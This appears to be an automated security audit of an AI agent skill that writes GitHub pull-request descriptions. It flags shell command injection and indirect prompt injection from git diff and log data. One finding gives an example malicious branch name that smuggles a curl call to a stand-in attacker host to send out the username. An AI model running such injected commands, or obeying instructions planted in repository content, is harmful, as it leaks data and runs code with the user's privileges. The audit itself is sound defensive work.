cmd-pr-description

Fail

Audited by Gen Agent Trust Hub on Apr 29, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • [COMMAND_EXECUTION]: The skill uses shell command substitution $(cat PR_DESCRIPTION.md) to pass AI-generated content into the gh pr edit and gh pr create commands. If the AI generates a description containing shell-sensitive characters such as backticks or subshell syntax (e.g., $(...)), the local shell will execute those commands with the privileges of the user.
  • [COMMAND_EXECUTION]: User-provided input for the base branch name is directly interpolated into multiple shell commands, such as git diff $BASE_BRANCH and git rev-parse --verify "$BASE_BRANCH". While some instances are quoted, others are not, allowing for shell command injection if a malicious branch name is provided (e.g., main; curl http://attacker.com/$(whoami)).
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection (Category 8).
    • Ingestion points: The skill reads untrusted data from the repository using git diff and git log in SKILL.md.
    • Boundary markers: There are no delimiters or instructions provided to the agent to treat the diff/log data as untrusted or to ignore embedded instructions.
    • Capability inventory: The skill has the capability to write files (PR_DESCRIPTION.md), commit changes, push to remote repositories, and interact with GitHub via the gh CLI.
    • Sanitization: There is no validation, escaping, or sanitization of the data retrieved from the git history before it is processed by the AI or used in subsequent shell commands.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Apr 29, 2026, 03:22 PM